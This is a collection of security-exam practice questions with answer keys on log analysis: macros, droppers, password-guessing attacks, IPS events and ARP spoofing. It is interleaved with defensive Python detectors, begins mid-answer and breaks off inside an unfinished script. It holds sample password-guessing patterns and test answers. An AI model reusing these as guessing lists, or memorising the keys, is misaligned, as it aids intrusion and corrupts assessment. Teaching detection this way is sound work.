(C)✅ In Windows systems, application logs are stored in Windows Event Viewer.
(D)✅ Since logs can be stored in multiple locations, all of the above is the correct answer.
A Windows Event Viewer log shows the following sequence of events:
1️⃣ A document named ‘Q3-Financials.docx’ was opened.
2️⃣ A macro execution attempt was blocked.
3️⃣ A macro security alert was triggered.
4️⃣ The macro code was scanned and matched known malware.
5️⃣ The file was quarantined.
What should the security team conclude from these logs?
A) The document contains a malicious macro and was successfully blocked.
B) The document is safe, and the macro execution was a false positive.
C) The user manually disabled macros, preventing execution.
D) The security system failed to detect the malware.
✅ Correct Answer: A - The document contains a malicious macro and was successfully blocked.
🔹 Explanation of Options:
(A)✅ The log shows a macro was detected, scanned, and confirmed as malware. The system quarantined the file, preventing harm.
(B)❌ Since the macro matched known malware, this is not a false positive.
(C)❌ The security system blocked it, rather than the user manually disabling macros.
(D)❌ The logs confirm that the malware was detected and neutralized.
A Microsoft Word document contains a macro, and when opened, the following message appears:
⚠ “Macros have been disabled. Enable Content?”
What is the safest action the user should take?
A) Immediately enable the macro to allow the document to function.
B) Only enable macros if the document is from a trusted source.
C) Ignore the warning and close the document.
D) Run the macro in a sandboxed environment to analyze its behavior.
✅ Correct Answer: B - Only enable macros if the document is from a trusted source.
🔹 Explanation of Options:
(A)❌ Enabling macros without verification could activate malware.
(B)✅ Macros can be useful, but they should only be enabled from trusted sources.
(C)❌ Ignoring the warning without analyzing the source doesn’t provide security assurance.
(D)❌ Sandbox detonation is how an analyst examines a suspicious macro, but it is not the action expected of an end user and is not the safest everyday response to this prompt.
A Windows Event Viewer application log contains the following suspicious activity:
🔹 Event ID 5400 - Macro execution attempt blocked.
🔹 Event ID 5401 - Macro security alert triggered.
🔹 Event ID 5402 - Macro scan completed: Malware detected.
🔹 Event ID 5403 - File quarantined: Q3-Financials.docx.
🔹 Event ID 5409 - Admin alert generated for malicious macro.
What best describes the security response?
A) The document was allowed to run, and the system was infected.
B) The macro was detected and successfully quarantined.
C) The user ignored the macro security alert and enabled the macro.
D) The log data is inconclusive, requiring further investigation.
✅ Correct Answer: B - The macro was detected and successfully quarantined.
🔹 Explanation of Options:
(A)❌ The log confirms the file was quarantined, meaning the system was not infected.
(B)✅ Security controls blocked and quarantined the malicious macro, preventing harm.
(C)❌ The logs show that security automatically handled the threat.
(D)❌ The data clearly shows a malware response was taken.
A system administrator is investigating frequent application crashes on a Windows machine. Where should they look first?
A) Network logs
B) Windows Event Viewer → Application Logs
C) Windows Registry
D) Task Manager
✅ Correct Answer: B - Windows Event Viewer → Application Logs.
🔹 Explanation of Options:
(A)❌ Network logs track network activity, not application errors.
(B)✅ The Windows Event Viewer Application Log records software crashes, making it the best place to start troubleshooting.
(C)❌ The Windows Registry contains system settings, not detailed error logs.
(D)❌ Task Manager shows running processes but doesn’t record historical crashes.
During the exam, how many log entries should you expect to analyze at a time?
A) Hundreds of log lines from multiple sources.
B) Short logs with 10-20 lines, focusing on key events.
C) A live stream of logs requiring real-time analysis.
D) Only system-wide logs, ignoring individual applications.
✅ Correct Answer: B - Short logs with 10-20 lines, focusing on key events.
🔹 Explanation of Options:
(A)❌ Analyzing hundreds of lines is impractical for an exam scenario.
(B)✅ Exam questions provide short logs with key indicators for analysis.
(C)❌ The exam does not require live log monitoring.
(D)❌ Individual application logs are important for troubleshooting.
A log entry shows:
🔹 Event ID 5409 → “Admin alert generated: Malicious macro detected in Q3-Financials.docx”
What does this indicate?
A) The system administrator was notified about a potential security risk.
B) The document was deleted automatically.
C) The user disabled security warnings and ran the macro.
D) The macro was harmless and ignored.
✅ Correct Answer: A - The system administrator was notified about a potential security risk.
🔹 Explanation of Options:
(A)✅ An admin alert means security teams were informed of a threat.
(B)❌ The document was quarantined, not deleted.
(C)❌ The logs indicate the macro was blocked, not executed.
(D)❌ Since the macro was flagged as malware, it was not harmless.
A user downloads and executes a file named setup.exe, which is later flagged by antivirus as suspicious. However, the user ignores the warning and allows it to run. What is the most likely purpose of setup.exe?
A) It is a legitimate application, and the antivirus produced a false positive.
B) It is a Stage One Dropper, designed to download additional malware.
C) It is the primary malware that will immediately start stealing data.
D) It is a normal update process required by the operating system.
✅ Correct Answer: B - It is a Stage One Dropper, designed to download additional malware.
🔹 Explanation of Options:
(A)❌ Antivirus alerts can be false positives, but ignoring them can be risky. In this case, further suspicious activity follows.
(B)✅ The subsequent entries in this scenario show setup.exe downloading another file (update.bin), meaning it serves as a Stage One Dropper.
(C)❌ The actual malware (Stage Two) executes later, after setup.exe completes its job.
(D)❌ Malware often disguises itself as updates, but this file initiated unauthorized connections.
After setup.exe runs, the system logs show an outbound connection to a remote server (92.168.47.81), and a binary file update.bin is downloaded. What does this indicate?
A) The system is receiving an official update.
B) The system is infected, and Stage Two malware is being delivered.
C) The file update.bin is likely a harmless binary file.
D) The connection is normal network activity.
✅ Correct Answer: B - The system is infected, and Stage Two malware is being delivered.
🔹 Explanation of Options:
(A)❌ While the file is named “update.bin,” malware frequently disguises itself as updates.
(B)✅ The log shows a Stage One Dropper fetching additional malware from an external IP, confirming an attack.
(C)❌ Binary files are not inherently malicious, but in this case, the behavior is highly suspicious.
(D)❌ The connection is not normal because it was triggered by a suspicious executable.
Shortly after update.bin is executed, the antivirus software stops running unexpectedly. What does this indicate?
A) A routine system update is taking place.
B) The malware is disabling security controls to avoid detection.
C) The antivirus software is overloaded and crashed.
D) The antivirus found no threats, so it shut down.
✅ Correct Answer: B - The malware is disabling security controls to avoid detection.
🔹 Explanation of Options:
(A)❌ System updates do not typically disable antivirus programs.
(B)✅ Many types of malware disable antivirus programs before deploying payloads.
(C)❌ While antivirus crashes happen, it is unlikely to coincide with a suspicious file execution.
(D)❌ Antivirus software does not shut down just because no threats are found.
After the execution of update.bin, a new process called malproc.exe appears in the system logs. What does this suggest?
A) A new, legitimate application was installed.
B) The system is running an unknown malicious process.
C) The update process completed successfully.
D) A software license verification tool was executed.
✅ Correct Answer: B - The system is running an unknown malicious process.
🔹 Explanation of Options:
(A)❌ If this were a legitimate application, it would not have followed an unauthorized binary download.
(B)✅ Malware frequently spawns new processes, like malproc.exe, which indicate malicious activity.
(C)❌ Update.bin was a malicious file, meaning this process is part of an attack.
(D)❌ No indication suggests that this process is for license verification.
The security team detects unusual outbound traffic from malproc.exe, and a breach alert is generated. What is the most likely explanation?
A) The system is performing normal background data synchronization.
B) The malware is exfiltrating stolen data to an attacker-controlled server.
C) The network administrator is troubleshooting a connection.
D) The endpoint detection system is malfunctioning.
✅ Correct Answer: B - The malware is exfiltrating stolen data to an attacker-controlled server.
🔹 Explanation of Options:
(A)❌ Normal data synchronization does not follow malware execution.
(B)✅ Data exfiltration is a common post-infection activity, especially after unauthorized outbound traffic is detected.
(C)❌ No log entry suggests administrator involvement.
(D)❌ The breach alert was triggered due to actual suspicious activity, not a system malfunction.
The security team notices a file named update.bin in the logs. What does the .bin extension indicate?
A) The file contains non-text binary data, possibly compiled code.
B) The file is an encrypted text document.
C) The file is a harmless software update.
D) The file cannot be executed.
✅ Correct Answer: A - The file contains non-text binary data, possibly compiled code.
🔹 Explanation of Options:
(A)✅ .bin is a generic extension for binary data such as compiled code, firmware or an encrypted payload; it says nothing about whether the content is benign, and droppers routinely use it for a second stage.
(B)❌ .bin files are not encrypted text files.
(C)❌ The file may be disguised as an update, but behavior in the logs suggests malware.
(D)❌ Binary files can be executed, depending on the system and file permissions.
An endpoint detection system (EDS) logs a breach alert due to malware infection and data exfiltration. What should be the first response?
A) Immediately disconnect the affected system from the network.
B) Delete the logs and restart the system.
C) Manually remove malproc.exe and resume normal operations.
D) Allow the process to continue to observe further activity.
✅ Correct Answer: A - Immediately disconnect the affected system from the network.
🔹 Explanation of Options:
(A)✅ Disconnecting the system prevents further damage and stops malware from communicating with an attacker.
(B)❌ Deleting logs erases crucial forensic evidence needed for investigation.
(C)❌ Simply removing the process does not address potential hidden malware components.
(D)❌ Allowing the malware to continue running increases the risk of data loss.
A security administrator is reviewing OS security logs and notices the following failed login attempts:
Time User Event IP Address Status Details (PIN)
16:45:01 jdoe Login Attempt 192.55.233.89 Failed 123456
16:45:03 jdoe Login Attempt 192.55.233.89 Failed 123457
16:45:05 jdoe Login Attempt 192.55.233.89 Failed 123458
16:45:07 jdoe Login Attempt 192.55.233.89 Failed 123459
16:45:09 jdoe Login Attempt 192.55.233.89 Failed 123450
16:45:11 jdoe Account Locked 192.55.233.89 N/A Too many failed attempts
What type of password attack does this log indicate?
A) Dictionary attack
B) Credential stuffing attack
C) Brute force attack
D) Phishing attack
✅ Correct Answer: C - Brute force attack
🔹 Explanation of Options:
(A)❌ Dictionary attacks use common words, but this attack is sequentially guessing numeric PINs.
(B)❌ Credential stuffing uses previously stolen usernames and passwords, which is not evident here.
(C)✅ A brute force attack tries every possible combination systematically, as seen with sequential PIN attempts.
(D)❌ Phishing attacks rely on deception rather than direct login attempts.
A security analyst is reviewing failed login attempts and notices the following:
Time User Event IP Address Status Details (Password Attempt)
17:01:01 msmith Login Attempt 192.55.233.89 Failed puppy
17:01:03 msmith Login Attempt 192.55.233.89 Failed baseball
17:01:05 msmith Login Attempt 192.55.233.89 Failed cupcake
17:01:07 msmith Login Attempt 192.55.233.89 Failed companion
17:01:09 msmith Login Attempt 192.55.233.89 Failed loved
17:01:11 msmith Account Locked 192.55.233.89 N/A Too many failed attempts
Which type of password attack does this log indicate?
A) Brute force attack
B) Dictionary attack
C) Rainbow table attack
D) Social engineering attack
✅ Correct Answer: B - Dictionary attack
🔹 Explanation of Options:
(A)❌ Brute force attacks try all possible combinations, but here, common words are being tested.
(B)✅ Dictionary attacks use a list of common words or phrases, which matches this pattern.
(C)❌ Rainbow table attacks involve precomputed hashes, which are not used in direct login attempts.
(D)❌ Social engineering attacks manipulate people, not password systems.
A company enforces an account lockout policy after five failed login attempts within one minute. A user’s account was locked after multiple failed login attempts using common words. What is the primary purpose of this security measure?
A) To prevent brute force attacks
B) To block users from forgetting their passwords
C) To improve network performance
D) To allow unlimited password guesses
✅ Correct Answer: A - To prevent brute force attacks
🔹 Explanation of Options:
(A)✅ Lockout policies are designed to stop repeated login attempts, which are a hallmark of brute force and dictionary attacks.
(B)❌ Lockout policies help security, not user memory issues.
(C)❌ Network performance is unrelated to login attempts.
(D)❌ The opposite is true—this policy restricts password guessing.
Which of the following best differentiates a brute force attack from a dictionary attack?
A) A brute force attack only targets numeric passwords, while a dictionary attack targets alphabetic passwords.
B) A dictionary attack uses common words, while a brute force attack systematically tests all possible combinations.
C) A brute force attack can only be used on online systems, while a dictionary attack is used offline.
D) A dictionary attack is faster than a brute force attack because it only targets administrator accounts.
✅ Correct Answer: B - A dictionary attack uses common words, while a brute force attack systematically tests all possible combinations.
🔹 Explanation of Options:
(A)❌ Brute force attacks can target any type of password, not just numbers.
(B)✅ Dictionary attacks use a predefined list of common passwords, while brute force attacks systematically try every possibility.
(C)❌ Both attacks can be used in online and offline environments.
(D)❌ Dictionary attacks can be faster, but they are not limited to administrator accounts.
A security analyst notices repeated login attempts from multiple IP addresses trying common passwords like “password123”, “admin”, and “letmein”. What attack type does this indicate?
A) Dictionary attack
B) Brute force attack
C) Credential stuffing
D) Man-in-the-middle attack
✅ Correct Answer: A - Dictionary attack
🔹 Explanation of Options:
(A)✅ Guessing a short list of well-known passwords is a dictionary attack. When the same few passwords are tried against many accounts from many source IPs, the variant is usually called password spraying, which is designed to stay under per-account lockout thresholds.
(B)❌ A brute force attack would try all possible combinations, not just common words.
(C)❌ Credential stuffing uses stolen username-password pairs, not common words.
(D)❌ Man-in-the-middle attacks intercept communications, rather than guessing passwords.
A hacker is testing password variations like “Summer2023!”, “S!ummer2023”, and “S@mm3r2023”. What type of attack is being used?
A) Brute force attack
B) Dictionary attack
C) Hybrid attack
D) Phishing attack
✅ Correct Answer: C - Hybrid attack
🔹 Explanation of Options:
(A)❌ Brute force attacks try all possible passwords, but this attack is using word-based variations.
(B)❌ Dictionary attacks use basic words without many modifications.
(C)✅ Hybrid attacks mix dictionary words with slight alterations (symbols, numbers).
(D)❌ Phishing relies on social engineering, not automated password guessing.
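Added example (not part of the original flashcards) for the failed-login cards above: it groups failures by user and source IP, applies the five-in-sixty-seconds lockout rule from the lockout-policy card, and labels each source brute force, dictionary or hybrid from the attempted secrets. The jdoe PIN run and msmith wordlist run are copied from the cards; the simplified line format, the bwayne hybrid run (built from the Summer2023! variations) and the alee typo are constructed for the demo.

```python
import re
from collections import defaultdict

# Constructed log in a simplified "HH:MM:SS user LOGIN_FAILED ip attempt"
# format, reproducing the jdoe PIN run and msmith wordlist run from the
# cards plus a made-up hybrid run (bwayne) and a single typo (alee).
SAMPLE_LOG = """\
16:45:01 jdoe LOGIN_FAILED 192.55.233.89 123456
16:45:03 jdoe LOGIN_FAILED 192.55.233.89 123457
16:45:05 jdoe LOGIN_FAILED 192.55.233.89 123458
16:45:07 jdoe LOGIN_FAILED 192.55.233.89 123459
16:45:09 jdoe LOGIN_FAILED 192.55.233.89 123450
17:01:01 msmith LOGIN_FAILED 192.55.233.89 puppy
17:01:03 msmith LOGIN_FAILED 192.55.233.89 baseball
17:01:05 msmith LOGIN_FAILED 192.55.233.89 cupcake
17:01:07 msmith LOGIN_FAILED 192.55.233.89 companion
17:01:09 msmith LOGIN_FAILED 192.55.233.89 loved
17:30:00 bwayne LOGIN_FAILED 203.0.113.7 Summer2023!
17:30:02 bwayne LOGIN_FAILED 203.0.113.7 S!ummer2023
17:30:04 bwayne LOGIN_FAILED 203.0.113.7 S@mm3r2023
17:30:06 bwayne LOGIN_FAILED 203.0.113.7 Summ3r2023!
17:30:08 bwayne LOGIN_FAILED 203.0.113.7 $ummer2023
09:00:00 alee LOGIN_FAILED 198.51.100.9 typo
"""

LINE_RE = re.compile(r"^(\d\d):(\d\d):(\d\d) (\S+) LOGIN_FAILED (\S+) (\S+)$")

def parse(log_text):
    """Return {(user, ip): [(seconds_since_midnight, attempt), ...]}."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # not a failed-login record
        h, mi, s, user, ip, attempt = m.groups()
        seconds = int(h) * 3600 + int(mi) * 60 + int(s)
        groups[(user, ip)].append((seconds, attempt))
    return groups

def exceeds_lockout(events, threshold=5, window=60):
    """True if `threshold` failures fall inside any `window`-second span."""
    times = sorted(t for t, _ in events)
    return any(times[i + threshold - 1] - times[i] <= window
               for i in range(len(times) - threshold + 1))

def classify(attempts):
    """Infer the guessing technique from the attempted secrets. Heuristic:
    real brute force need not be sequential, and a long enough wordlist can
    look like either, so treat this as a triage hint, not proof."""
    if all(a.isdigit() for a in attempts) and len({len(a) for a in attempts}) == 1:
        return "brute force"          # walking a fixed-length numeric keyspace
    if all(a.isalpha() and a.islower() for a in attempts):
        return "dictionary"           # unmodified wordlist entries
    if all(sum(c.isalpha() for c in a) >= 3 and re.search(r"[\d!@#$%^&*]", a)
           for a in attempts):
        return "hybrid"               # wordlist entries with mangling rules
    return "unknown"

def triage(log_text, threshold=5, window=60):
    """Return {(user, ip): label} for sources that tripped the lockout rule."""
    return {key: classify([a for _, a in events])
            for key, events in parse(log_text).items()
            if exceeds_lockout(events, threshold, window)}

if __name__ == "__main__":
    for (user, ip), label in triage(SAMPLE_LOG).items():
        print(f"{user} from {ip}: {label}")
```

Note that alee's single failure never reaches the lockout rule and is therefore not labelled at all; an attacker who paces attempts below the threshold, or sprays across accounts, evades per-account lockout entirely, which is why the same logic is usually also keyed on source IP alone.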
A security analyst reviews an IPS log and finds the following entries:
Event ID Severity Description Action Taken
4105 High SQL Injection Attack Detected Blocked
4110 High Buffer Overflow Attempt Blocked
4120 High External Brute Force Attack Blocked
4130 High Data Exfiltration Detected Alerted
3301 Medium ICMP Echo Request Flood Monitored
Which event requires immediate investigation?
A) Event 4105 - SQL Injection Attack
B) Event 4110 - Buffer Overflow Attempt
C) Event 4130 - Data Exfiltration Detected
D) Event 3301 - ICMP Echo Request Flood
✅ Correct Answer: C - Event 4130 (Data Exfiltration Detected)
🔹 Explanation of Options:
(A)❌ SQL injection is dangerous, but the IPS blocked this attempt, so it ranks below an event that got through; it still merits review.
(B)❌ A buffer overflow attempt can lead to system takeover, but it was blocked, so it is not the first priority.
(C)✅ Data exfiltration is the most severe event because the IPS only alerted on it, meaning nothing stopped it and sensitive data may already be leaving the network.
(D)❌ ICMP flood attacks (ping floods) can impact network performance, but they are not as critical as data exfiltration.
Which of the following statements is true regarding Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS)?
A) IDS actively blocks attacks, while IPS only logs them.
B) If an event is blocked, it was handled by an IPS.
C) An IDS can prevent attacks, while an IPS only detects them.
D) An IPS does not alert administrators, only logs them.
✅ Correct Answer: B - If an event is blocked, it was handled by an IPS.
🔹 Explanation of Options:
(A)❌ IPS actively blocks threats, while IDS only detects and alerts.
(B)✅ An IPS can both detect and block attacks, so a blocked event confirms that an IPS was used.
(C)❌ IDS cannot prevent attacks, it can only alert security teams.
(D)❌ IPS can both block attacks and alert administrators about critical security events.
A network administrator notices a large number of suspicious ARP replies coming from an internal IP address. What is the most likely attack taking place?
A) SQL Injection
B) ARP Spoofing
C) ICMP Flood Attack
D) Brute Force Attack
✅ Correct Answer: B - ARP Spoofing
🔹 Explanation of Options:
(A)❌ SQL Injection targets databases, not network communications.
(B)✅ ARP Spoofing is an attack where a malicious actor sends fake ARP replies to redirect network traffic through their system.
(C)❌ ICMP floods are DoS attacks using ping requests, not ARP manipulation.
(D)❌ Brute force attacks involve repeated login attempts, not ARP modifications.
An IPS log shows repeated ARP Spoofing attempts originating from an internal IP address (192.168.1.50). What does this indicate?
A) The attack is coming from an external hacker.
B) The attack is being performed by an insider threat.
C) The event is likely a false positive.
D) The attack is a brute force login attempt.
✅ Correct Answer: B - The attack is being performed by an insider threat.
🔹 Explanation of Options:
(A)❌ ARP is a Layer 2 protocol that does not cross routers, so ARP spoofing can only be carried out by a host in the same broadcast domain (VLAN) as its victims.
(B)✅ Since the attacker is using an internal IP, it is likely an insider threat (or an infected device inside the network).
(C)❌ While false positives happen, repeated ARP Spoofing attempts are highly suspicious.
(D)❌ ARP Spoofing manipulates network communications, not login credentials.
A brute force login attempt was detected on a company’s web server. The IPS blocked the attacker’s IP address. What should the next step be?
A) No further action is required since the IPS blocked it.
B) Investigate the attacker’s source and block their IP permanently if needed.
C) Disable the IPS since it is already handling attacks.
D) Reset all user passwords immediately.
✅ Correct Answer: B - Investigate the attacker’s source and block their IP permanently if needed.
🔹 Explanation of Options:
(A)❌ Even though the attack was blocked, an investigation should still be conducted to assess further risk.
(B)✅ The attacker may attempt different methods to bypass security, so blocking their IP at the firewall is a good proactive step.
(C)❌ Disabling the IPS would remove a critical security layer, increasing risk.
(D)❌ Resetting all user passwords is unnecessary unless there is evidence of account compromise.
A cybersecurity analyst reviews the following IPS log:
Event ID Severity Description Action Taken
4105 High SQL Injection Attack Detected Blocked
4110 High Buffer Overflow Attempt Blocked
4125 High Internal Network Scan Blocked
4130 High Data Exfiltration Detected Alerted
4301 Medium Excessive Login Attempts Monitored
Which event should the security team investigate first?
A) Event 4105 - SQL Injection Attack
B) Event 4125 - Internal Network Scan
C) Event 4130 - Data Exfiltration Detected
D) Event 4301 - Excessive Login Attempts
✅ Correct Answer: C - Event 4130 (Data Exfiltration Detected)
🔹 Explanation of Options:
(A)❌ SQL Injection is dangerous, but since it was blocked it ranks below an event that was not.
(B)❌ Network scanning is often used for reconnaissance, but it does not indicate immediate data theft.
(C)✅ Data exfiltration is a serious threat because it means sensitive data may have been stolen. Since it was only alerted (not blocked), it requires urgent investigation.
(D)❌ Excessive login attempts may suggest brute force, but it was only monitored, not immediately dangerous.
A security analyst reviews the following network log:
Date Time Interface Action Details
02/25/2025 14:10:01 Gi0/1 Allow Inbound: 192.168.1.105 → 192.168.1.10 (TCP/80)
02/25/2025 14:10:05 Gi0/1 Allow Outbound: 192.168.1.15 → 8.8.8.8 (UDP/53)
02/25/2025 14:10:10 Gi0/1 ARP Reply 192.168.1.10 is at AA:BB:CC:DD:EE:FF
02/25/2025 14:10:12 Gi0/1 ARP Reply 192.168.1.10 is at 11:22:33:44:55:66
02/25/2025 14:10:20 Gi0/1 Allow Inbound: 192.168.1.10 → 192.168.1.20 (TCP/443)
02/25/2025 14:10:25 Gi0/1 ARP Reply 192.168.1.10 is at AA:BB:CC:DD:EE:FF
02/25/2025 14:10:27 Gi0/1 ARP Reply 192.168.1.10 is at 11:22:33:44:55:66
Which of the following is the most likely conclusion?
A) Normal network activity with internal web traffic.
B) An external attacker attempting to scan the network.
C) An ARP Spoofing attack in progress.
D) A failed DNS query due to an incorrect firewall rule.
✅ Correct Answer: C - An ARP Spoofing attack in progress.
🔹 Explanation of Options:
(A)❌ Normal traffic would not involve repeated MAC address changes for the same IP.
(B)❌ A network scan typically involves multiple probing requests over different ports, not ARP changes.
(C)✅ The MAC address changes rapidly between two different values for the same IP address, a classic sign of ARP spoofing.
(D)❌ No evidence of a failed DNS query exists in the logs; the DNS query to 8.8.8.8 was allowed.
A security administrator notices multiple ARP replies from a single IP address, mapping to different MAC addresses in a short time frame. What should be the best course of action?
A) Block the IP address at the firewall.
B) Investigate the source of ARP replies and check for MITM attack activity.
C) Disable all ARP traffic on the network.
D) Ignore the event since ARP traffic naturally fluctuates.
✅ Correct Answer: B - Investigate the source of ARP replies and check for MITM attack activity.
🔹 Explanation of Options:
(A)❌ A Layer 3 firewall rule cannot stop ARP, which operates at Layer 2; the relevant controls are switch features such as Dynamic ARP Inspection, port security, and static ARP entries for critical hosts.
(B)✅ Investigating ARP behavior is the correct approach, as repeated MAC changes indicate potential ARP spoofing and possible Man-in-the-Middle (MITM) activity.
(C)❌ Disabling ARP is not feasible as it is necessary for network communication.
(D)❌ While some ARP changes occur naturally, rapid flipping between MAC addresses is highly suspicious.
A network administrator is analyzing router logs and sees an entry denying inbound UDP traffic on Port 137 (NetBIOS) from 192.168.1.105 to 192.168.1.255 (broadcast).
What is the most likely interpretation of this log entry?
A) A network-wide NetBIOS broadcast attempt that was blocked.
B) A misconfigured firewall rule blocking legitimate traffic.
C) A brute force attack on an internal web server.
D) Normal DNS resolution traffic.
✅ Correct Answer: A - A network-wide NetBIOS broadcast attempt that was blocked.
🔹 Explanation of Options:
(A)✅ NetBIOS over UDP 137 is used for name resolution and can be used for enumeration. Blocking it helps prevent unauthorized access.
(B)❌ While a misconfiguration is possible, blocking NetBIOS broadcasts is often intentional for security reasons.
(C)❌ A brute force attack typically involves login attempts over services like SSH or RDP, not NetBIOS.
(D)❌ DNS queries typically use UDP port 53, not 137.
A network administrator sees the following router log entry:
Date Time Interface Action Details
03/01/2025 15:23:10 Gi0/1 Allow Outbound: 192.168.1.15 → 8.8.8.8 (UDP/53)
03/01/2025 15:23:12 Gi0/1 Allow Outbound: 192.168.1.13 → 8.8.4.4 (UDP/53)
03/01/2025 15:23:15 Gi0/1 Allow Inbound: 192.168.1.10 → 192.168.1.20 (TCP/80)
03/01/2025 15:23:20 Gi0/1 ARP Reply 192.168.1.10 is at AA:BB:CC:DD:EE:FF
03/01/2025 15:23:23 Gi0/1 ARP Reply 192.168.1.10 is at 11:22:33:44:55:66
03/01/2025 15:23:26 Gi0/1 ARP Reply 192.168.1.10 is at AA:BB:CC:DD:EE:FF
What should the administrator do next?
A) Investigate for possible ARP Spoofing.
B) Shut down all DNS servers immediately.
C) Ignore the logs since ARP changes occur naturally.
D) Block all outbound HTTP traffic.
✅ Correct Answer: A - Investigate for possible ARP Spoofing.
🔹 Explanation of Options:
(A)✅ The repeated MAC address changes indicate a possible ARP Spoofing attack and should be investigated.
(B)❌ DNS servers are unrelated to ARP spoofing and should not be shut down.
(C)❌ ARP changes can happen naturally, but rapid switching between MAC addresses is suspicious.
(D)❌ HTTP traffic (TCP/80) is unrelated to ARP spoofing.
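Added example (not part of the original flashcards) for the two ARP log cards above: it parses router log lines in the format shown, keeps only the ARP Reply entries, and flags any IP address that is claimed by more than one MAC address within a short window, counting each change as a flip. The sample lines reproduce the second card's log, with one extra ARP reply for 192.168.1.1 constructed to show a stable mapping that is not flagged.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed from the router log in the card above; the final line for
# 192.168.1.1 is added as a control that should not be flagged.
SAMPLE_LOG = """\
03/01/2025 15:23:10 Gi0/1 Allow Outbound: 192.168.1.15 → 8.8.8.8 (UDP/53)
03/01/2025 15:23:12 Gi0/1 Allow Outbound: 192.168.1.13 → 8.8.4.4 (UDP/53)
03/01/2025 15:23:15 Gi0/1 Allow Inbound: 192.168.1.10 → 192.168.1.20 (TCP/80)
03/01/2025 15:23:20 Gi0/1 ARP Reply 192.168.1.10 is at AA:BB:CC:DD:EE:FF
03/01/2025 15:23:23 Gi0/1 ARP Reply 192.168.1.10 is at 11:22:33:44:55:66
03/01/2025 15:23:26 Gi0/1 ARP Reply 192.168.1.10 is at AA:BB:CC:DD:EE:FF
03/01/2025 15:23:30 Gi0/1 ARP Reply 192.168.1.1 is at 00:11:22:33:44:55
"""

ARP_RE = re.compile(
    r"^(\d\d/\d\d/\d{4} \d\d:\d\d:\d\d) (\S+) ARP Reply (\d+\.\d+\.\d+\.\d+) "
    r"is at ([0-9A-Fa-f:]{17})$")

def parse_arp_replies(log_text):
    """Yield (timestamp, interface, ip, mac) for ARP Reply lines only;
    Allow/Deny records are ignored."""
    for line in log_text.splitlines():
        m = ARP_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%m/%d/%Y %H:%M:%S")
            yield ts, m.group(2), m.group(3), m.group(4).upper()

def find_arp_conflicts(log_text, window_seconds=60):
    """Return {ip: {"macs": [...], "flips": n}} for every IP whose MAC changed
    within `window_seconds` of the previous reply for that IP. A flip is one
    reply whose MAC differs from the immediately preceding reply."""
    last = {}                                  # ip -> (timestamp, mac)
    findings = defaultdict(lambda: {"macs": set(), "flips": 0})
    for ts, _iface, ip, mac in parse_arp_replies(log_text):
        if ip in last:
            prev_ts, prev_mac = last[ip]
            if mac != prev_mac and (ts - prev_ts).total_seconds() <= window_seconds:
                findings[ip]["flips"] += 1
                findings[ip]["macs"].update({prev_mac, mac})
        last[ip] = (ts, mac)
    return {ip: {"macs": sorted(f["macs"]), "flips": f["flips"]}
            for ip, f in findings.items()}

if __name__ == "__main__":
    for ip, f in find_arp_conflicts(SAMPLE_LOG).items():
        print(f"{ip} claimed by {len(f['macs'])} MACs, {f['flips']} flips: {f['macs']}")
```

Before calling it spoofing, rule out the legitimate causes of a changing MAC: a redundancy pair (HSRP/VRRP) failing over, a DHCP lease moving to a different host, or a virtual machine migrating. Rapid back-and-forth between the same two addresses, as here, is what distinguishes poisoning from those one-way changes.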
1️⃣ Scenario: Investigating a Suspicious File
You are an incident response analyst investigating a suspicious email attachment named invoice.pdf. You extract its metadata and find the following details:
File Type: Executable (.exe)
File Hash (SHA-256): Matches a known malware signature
Creation Date: 2012, but the email claims it was created today
Owner: User “Joe,” who received the email and opened it
What is the best action to take based on this metadata?
A) Allow the file since it has a “.pdf” extension
B) Block the file and prevent further execution
C) Rename the file to “invoice.pdf.exe” for better visibility
D) Ignore the alert since no antivirus flagged it as malware
✅ Correct Answer: B) Block the file and prevent further execution
📌 Explanation:
The extension says .pdf, but the content identifies the file as an executable, which is suspicious on its own.
The SHA-256 hash matches a known malware signature, confirming it’s malicious.
The creation date mismatch is another red flag.
The best action is to block the file and ensure it cannot execute further.
A cybersecurity team receives a report of suspicious file downloads. A user downloads a file named report.pdf, but a forensic scan reveals that it is actually a JPEG image.
What does this indicate?
A) Normal behavior, since file extensions can be arbitrary
B) A harmless mislabeling of a file
C) A potentially suspicious or malicious file
D) A problem with the user’s operating system
✅ Correct Answer: C) A potentially suspicious or malicious file
📌 Explanation:
Windows picks the program that opens a file from its extension (.pdf, .jpg), so the name alone says nothing about the contents.
Linux/Unix tools such as file(1) identify the type from the first bytes of the file (its magic number), which is how the forensic scan spotted the mismatch.
When the extension and the actual file type don't match, the file was mislabelled, deliberately or carelessly; a disguised executable is the classic case, so treat it as suspicious until examined.
Your organization suffered a phishing attack where multiple users downloaded a malicious file named update.bin. To prevent future infections, you decide to block the malware.
Which method is the most effective way to prevent future downloads?
A) Block the file based on its name
B) Block all .bin file downloads
C) Block the file using its MD5/SHA-256 hash
D) Disable all email attachments in the network
✅ Correct Answer: C) Block the file using its MD5/SHA-256 hash
📌 Explanation:
A SHA-256 hash is a fingerprint of a file's exact contents, so blocking on it catches this sample regardless of its name or extension (MD5 still appears in block lists but is no longer collision-resistant, so prefer SHA-256). A hash only matches that exact sample: a recompiled or padded variant gets a new hash, so hash blocking is a precise first response, not a complete defence.
Blocking by file name or extension (.bin) is ineffective, as attackers can rename the file.
Disabling all email attachments is too restrictive and impractical.
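The three file cards above (the invoice.pdf that is really an executable, the report.pdf that is really a JPEG, and blocking update.bin by hash) all come down to two checks an analyst would script: compare the type implied by the extension with the type implied by the magic bytes, and compare the SHA-256 with a block list. The Python below is an added example, not code from the flashcards; the magic-byte table is a small subset of what libmagic knows, and the sample file contents and the block list entry are constructed here (the "known malware" hash is just the hash of our fake invoice).

```python
"""Check a file's real type against its claimed extension and its SHA-256
against a block list. All sample contents and hashes are constructed here."""
import hashlib
import os

# Extension -> canonical type, and the magic bytes each canonical type starts with.
# Small subset; real tooling (libmagic / file(1)) knows thousands of signatures.
EXT_TO_TYPE = {"pdf": "pdf", "jpg": "jpeg", "jpeg": "jpeg", "png": "png",
               "exe": "pe", "dll": "pe", "zip": "zip"}
MAGIC = [
    ("pdf", b"%PDF-"),
    ("jpeg", b"\xff\xd8\xff"),
    ("png", b"\x89PNG\r\n\x1a\n"),
    ("pe", b"MZ"),          # Windows PE executables start with the DOS stub
    ("zip", b"PK\x03\x04"),
]

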